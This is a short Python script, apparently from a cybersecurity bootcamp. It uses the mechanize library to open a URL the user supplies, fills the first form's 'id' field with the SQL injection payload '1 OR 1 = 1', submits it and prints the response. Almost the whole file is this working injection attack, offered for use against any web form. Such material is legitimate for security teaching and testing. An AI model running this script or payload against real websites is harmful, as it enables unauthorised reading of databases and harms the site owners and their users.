#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = "rikrdo"
__copyright__ = "Copyright 2022, Bootcamp Cybersec "
__credits__ = ["rikrdo"]
__license__ = "GPL"
__version__ = "1.0.1"
__maintainer__ = "rikrdo"
__email__ = "rikrdo@rikrdo.es"
__status__ = "Production"

# required libraries

import mechanize

url = input("Enter the full url")

request = mechanize.Browser()
request.open(url)

request.select_form(nr = 0)

request["id"] = "1 OR 1 = 1"

response = request.submit()
content = response.read()
print (content)